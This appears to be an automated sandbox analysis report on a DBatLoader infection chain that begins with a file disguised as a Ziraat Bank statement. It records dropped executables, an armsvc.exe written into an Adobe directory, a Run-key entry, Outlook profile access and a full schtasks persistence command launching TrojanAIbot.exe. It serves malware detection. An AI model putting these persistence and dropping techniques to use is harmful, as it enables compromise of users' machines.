Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: TrojanAIbot.exe.lnk.13.dr

LNK file: ..\..\..\..\..\ACCApi\TrojanAIbot.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Static file information: File size 1082267 > 1048576

Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.2196618824.000000007ECA7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E3B7000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020B17000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2089112584.000000007E330000.00000004.00001000.00020000.00000000.sdmp, Wisrysxl.PIF, 00000019.00000002.2301848432.00000000209D7000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002B5F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E9F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002B56000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2111066376.0000000021E70000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054000196.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A75000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2106786237.0000000005180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000008.00000003.2111119072.0000000000B90000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Yara detected DBatLoader

Source: Yara match	File source: 4.2.x.exe.2d90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: lxsyrsiW.pif.4.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DA894C LoadLibraryW,GetProcAddress,FreeLibrary,

4_2_02DA894C

Source: armsvc.exe.11.dr	Static PE information: real checksum: 0x32318 should be: 0x149394
Source: neworigin.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x480db
Source: Wisrysxl.PIF.9.dr	Static PE information: real checksum: 0x0 should be: 0x10a70e
Source: x.exe.2.dr	Static PE information: real checksum: 0x0 should be: 0x10a70e
Source: server_BTC.exe.11.dr	Static PE information: real checksum: 0x0 should be: 0x42478
Source: lxsyrsiW.pif.4.dr	Static PE information: real checksum: 0x0 should be: 0x1768a
Source: TrojanAIbot.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x42478

Source: alpha.pif.7.dr	Static PE information: section name: .didat
Source: armsvc.exe.11.dr	Static PE information: section name: .didat

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBD2FC push 02DBD367h; ret	4_2_02DBD35F
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D963B0 push 02D9640Bh; ret	4_2_02D96403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D963AE push 02D9640Bh; ret	4_2_02D96403
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9C349 push 8B02D9C1h; ret	4_2_02D9C34E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBC378 push 02DBC56Eh; ret	4_2_02DBC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9332C push eax; ret	4_2_02D93368
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBD0AC push 02DBD125h; ret	4_2_02DBD11D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA306B push 02DA30B9h; ret	4_2_02DA30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA306C push 02DA30B9h; ret	4_2_02DA30B1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBD1F8 push 02DBD288h; ret	4_2_02DBD280
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBD144 push 02DBD1ECh; ret	4_2_02DBD1E4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DAF108 push ecx; mov dword ptr [esp], edx	4_2_02DAF10D
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D96782 push 02D967C6h; ret	4_2_02D967BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D96784 push 02D967C6h; ret	4_2_02D967BE
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9D5A0 push 02D9D5CCh; ret	4_2_02D9D5C4
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DBC570 push 02DBC56Eh; ret	4_2_02DBC566
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9C56C push ecx; mov dword ptr [esp], edx	4_2_02D9C571
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA8AD8 push 02DA8B10h; ret	4_2_02DA8B08
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DAAAE0 push 02DAAB18h; ret	4_2_02DAAB10
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9CBEC push 02D9CD72h; ret	4_2_02D9CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02E04850 push eax; ret	4_2_02E04920
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA886C push 02DA88AEh; ret	4_2_02DA88A6
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9C9DF push 02D9CD72h; ret	4_2_02D9CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA6948 push 02DA69F3h; ret	4_2_02DA69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA6946 push 02DA69F3h; ret	4_2_02DA69EB
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02D9C977 push 02D9CD72h; ret	4_2_02D9CD6A
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA790C push 02DA7989h; ret	4_2_02DA7981
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA5E7C push ecx; mov dword ptr [esp], edx	4_2_02DA5E7E
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_02DA2F60 push 02DA2FD6h; ret	4_2_02DA2FCE
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 12_2_02890C55 push edi; retf	12_2_02890C7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 14_2_06B525A0 push FFFFFFC3h; ret	14_2_06B525D8

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file

Drops executable to a common third party application directory

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\Public\Libraries\lxsyrsiW.pif

System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Jump to behavior

Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\Libraries\Wisrysxl.PIF	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\user\AppData\Local\Temp\x.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\x.exe	File created: C:\Users\Public\Libraries\lxsyrsiW.pif	Jump to dropped file
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	File created: C:\Users\user\AppData\Local\Temp\server_BTC.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\alpha.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\esentutl.exe	File created: C:\Users\Public\xpha.pif			Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 09:33 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Wisrysxl			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02DAAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_02DAAB1C

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\lxsyrsiW.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
